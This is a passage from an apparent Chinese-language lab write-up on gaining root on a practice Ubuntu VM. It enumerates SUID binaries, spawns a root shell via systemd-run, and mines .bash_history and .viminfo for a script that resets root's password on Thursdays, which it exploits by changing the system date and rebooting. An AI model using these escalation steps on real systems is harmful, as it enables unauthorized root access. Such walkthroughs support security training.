   135504     20 -rwsr-xr-x   1 root     root          18664 Mar 10  2016 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
      740    420 -rwsr-xr-x   1 root     root         428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   393321    140 -rwsr-xr-x   1 root     root         142032 Feb 17  2016 /bin/ntfs-3g
   393346     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
   393393     28 -rwsr-xr-x   1 root     root          27608 Apr 13  2016 /bin/umount
   393309     40 -rwsr-xr-x   1 root     root          40152 Apr 13  2016 /bin/mount
   393373     40 -rwsr-xr-x   1 root     root          40128 Mar 29  2016 /bin/su
   393272     32 -rwsr-xr-x   1 root     root          30800 Mar 11  2016 /bin/fusermount
   393347     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6

尝试 helper 提权

broken@ubuntu:/etc$ systemd-run -t bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.                                                                                                                                                                        
Authenticating as: Broken,,, (broken)
Password: 
==== AUTHENTICATION COMPLETE ===
Running as unit run-u42.service.                                                                                                                                                                                                            
Press ^] three times within 1s to disconnect TTY.
root@ubuntu:/# whoami
root

补充

这里需要对敏感文件进行查看 .bash_history, .viminfo，无论其中是否有敏感信息都需要查看，对自己的要求不能降低

broken@ubuntu:~$ ls -liah
total 124K
152057 drwxr-xr-x 17 broken broken 4.0K Aug  9  2019 .
131074 drwxr-xr-x  3 root   root   4.0K Aug  9  2019 ..
152710 -rw-------  1 broken broken 3.6K Jan  1  2018 .bash_history
152060 -rw-r--r--  1 broken broken  220 Aug  9  2019 .bash_logout
152058 -rw-r--r--  1 broken broken 3.7K Aug  9  2019 .bashrc
262259 drwx------ 14 broken broken 4.0K Aug  9  2019 .cache
281447 drwx------ 17 broken broken 4.0K Aug  9  2019 .config
290964 drwx------  3 root   root   4.0K Aug  9  2019 .dbus
281429 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Desktop
133504 -rw-r--r--  1 broken broken   25 Aug  9  2019 .dmrc
281443 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Documents
281430 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Downloads
152059 -rw-r--r--  1 broken broken 8.8K Aug  9  2019 examples.desktop
283212 drwx------  2 broken broken 4.0K Aug  9  2019 .gconf
282694 drwx------  3 broken broken 4.0K Aug  9  2019 .gnupg
133509 -rw-------  1 broken broken  636 Aug  9  2019 .ICEauthority
281655 drwx------  3 broken broken 4.0K Aug  9  2019 .local
152663 drwx------  4 broken broken 4.0K Aug  9  2019 .mozilla
281444 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Music
281445 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Pictures
152061 -rw-r--r--  1 broken broken  675 Aug  9  2019 .profile
281441 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Public
133508 -rw-r--r--  1 broken broken    0 Aug  9  2019 .sudo_as_admin_successful
281440 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Templates
281446 drwxr-xr-x  2 broken broken 4.0K Aug  9  2019 Videos
152728 -rw-------  1 broken broken 5.3K Aug  8  2019 .viminfo
133506 -rw-------  1 broken broken   51 Aug  9  2019 .Xauthority
152745 -rw-------  1 broken broken 1.3K Aug  9  2019 .xsession-errors
133507 -rw-------  1 broken broken 1.3K Aug  8  2019 .xsession-errors.old

实际上如果没有 gtfobins，这里靶机本身设计的提权思路并不是 timedatectl shell，从.viminfo 和 .bash_history 中可以看到一个特殊的文件 ./password-policy.sh，查看内容

broken@ubuntu:~$ cat /etc/init.d/password-policy.sh
#!/bin/bash

DAYOFWEEK=$(date +"%u")
echo DAYOFWEEK: $DAYOFWEEK

if [ "$DAYOFWEEK" -eq 4 ]
then
        sudo sh -c 'echo root:TodayIsAgoodDay | chpasswd'
fi



#if [ "$DAYOFWEEK" == 4 ]

这里代码意为当周四的时候，将 root 的密码改为 TodayIsAgoodDay

我们可以通过 sudo timedatectl set-time '2023-06-29' 来修改当前时间，使用 sudo reboot 来重启，最后 ssh 重新登录 broken 用户，su 命令使用上述密码切换为root